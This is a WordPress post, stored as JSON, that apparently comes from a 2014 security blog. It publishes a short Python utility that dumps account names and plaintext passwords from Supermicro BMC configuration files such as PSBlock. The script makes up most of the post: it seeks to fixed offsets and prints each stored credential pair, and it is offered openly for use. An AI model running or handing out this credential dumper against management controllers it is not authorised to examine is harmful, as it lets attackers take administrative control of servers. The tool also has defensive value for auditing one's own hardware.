{"id":938,"date":"2014-01-25T14:32:52","date_gmt":"2014-01-25T14:32:52","guid":{"rendered":"https:\/\/trouble.org\/?p=938"},"modified":"2014-06-05T01:43:07","modified_gmt":"2014-06-05T01:43:07","slug":"dump-supermicro-stuff","status":"publish","type":"post","link":"https:\/\/trouble.org\/?p=938","title":{"rendered":"dump supermicro stuff"},"content":{"rendered":"

A trivial utility to dump password\/account information from a special file found on a SM BMC (see this R7 post<\/a> about the PSBlock file.)<\/p>\n

(Later edit – put a new version on github<\/a> that fixes a bug)<\/p>\n

#!\/usr\/bin\/env python<\/span>
\n
\n# usage: $0 file<\/span>
\n
\n#<\/span>
\n# (try to) Dump out passwords\/accounts from a SM binary file;<\/span>
\n# usually this is in \/conf or \/vm on the BMC, and goes by<\/span>
\n# various names such as PSBlock, PSStore, PMConfig.dat, and<\/span>
\n# the like.  This has *only* been tested on PSBlock files,<\/span>
\n# but the theory appears to be the same; find the first account<\/span>
\n# and password pair and march through the file at regular <\/span>
\n# intervals until you find all the matches.<\/span>
\n#<\/span>
\n
\nimport<\/span> re<\/span>
\nimport<\/span> sys<\/span>
\n
\nACCOUNT_SIZE  =<\/span> 16<\/span>
\nPASSWD_SIZE   =<\/span> 20<\/span>   # IPMI 2.0<\/span>
\nFIRST_ACCOUNT =<\/span> 85<\/span>   # the fun starts here<\/span>
\nNEXT_ACCOUNT  =<\/span> 64<\/span>   # N bytes later<\/span>
\nMAX_ACCOUNTS  =<\/span>  9<\/span>   # a guess<\/span>
\n
\ntry<\/span>:
\n   sm =<\/span> open<\/span>(<\/span>sys<\/span>.argv<\/span>[<\/span>1<\/span>]<\/span>,<\/span> "rb"<\/span>)<\/span>
\n
\nexcept<\/span>:
\n   print<\/span>(<\/span>"couldn't open %s"<\/span> % sys<\/span>.argv<\/span>[<\/span>1<\/span>]<\/span>)<\/span>
\n   sys<\/span>.exit<\/span>(<\/span>2<\/span>)<\/span>
\n
\n# skip first 84 bytes<\/span>
\nsm.seek<\/span>(<\/span>FIRST_ACCOUNT,<\/span>0<\/span>)<\/span>
\n
\n# loop for accounts\/passwords<\/span>
\nfor<\/span> i in<\/span> range<\/span>(<\/span>0<\/span>,<\/span>MAX_ACCOUNTS + 1<\/span>)<\/span>:
\n
\n   # go to the right place<\/span>
\n   sm.seek<\/span>(<\/span>FIRST_ACCOUNT + i * NEXT_ACCOUNT,<\/span> 0<\/span>)<\/span>
\n
\n   # grabit<\/span>
\n   account =<\/span> sm.read<\/span>(<\/span>ACCOUNT_SIZE)<\/span>
\n   passwd  =<\/span> sm.read<\/span>(<\/span>PASSWD_SIZE)<\/span>
\n
\n   # strip nulls<\/span>
\n   account =<\/span> re<\/span>.sub<\/span>(<\/span>'\\0<\/span>00*$'<\/span>,<\/span> ''<\/span>,<\/span> account)<\/span>
\n   passwd  =<\/span> re<\/span>.sub<\/span>(<\/span>'\\0<\/span>00*$'<\/span>,<\/span> ''<\/span>,<\/span> passwd)<\/span>
\n
\n   if<\/span> len<\/span>(<\/span>account)<\/span> ><\/span> 0<\/span> and<\/span> account[<\/span>0<\/span>]<\/span> !=<\/span> '\\0<\/span>00'<\/span>:
\n      print<\/span>(<\/span>"Account [%d]: %s"<\/span> % (<\/span>i,<\/span> account)<\/span>)<\/span>
\n      print<\/span>(<\/span>"Password[%d]: %s"<\/span> % (<\/span>i,<\/span> passwd)<\/span>)<\/span>
\n
\nsm.close<\/span>(<\/span>)<\/span><\/div><\/div>\n","protected":false},"excerpt":{"rendered":"

A trivial utility to dump password\/account information from a special file found on a SM BMC (see this R7 post about the PSBlock file.) (Later edit – put a new version on github that fixes a bug) #!\/usr\/bin\/env python # usage: $0 file # # (try to) Dump out passwords\/accounts from a SM binary file; […]<\/p>\n","protected":false},"author":44,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[31,176,154,172],"tags":[],"class_list":["post-938","post","type-post","status-publish","format-standard","hentry","category-code","category-embedded","category-ipmi-2","category-python"],"_links":{"self":[{"href":"https:\/\/trouble.org\/index.php?rest_route=\/wp\/v2\/posts\/938","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/trouble.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/trouble.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/trouble.org\/index.php?rest_route=\/wp\/v2\/users\/44"}],"replies":[{"embeddable":true,"href":"https:\/\/trouble.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=938"}],"version-history":[{"count":3,"href":"https:\/\/trouble.org\/index.php?rest_route=\/wp\/v2\/posts\/938\/revisions"}],"predecessor-version":[{"id":998,"href":"https:\/\/trouble.org\/index.php?rest_route=\/wp\/v2\/posts\/938\/revisions\/998"}],"wp:attachment":[{"href":"https:\/\/trouble.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=938"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/trouble.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=938"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/trouble.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=938"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}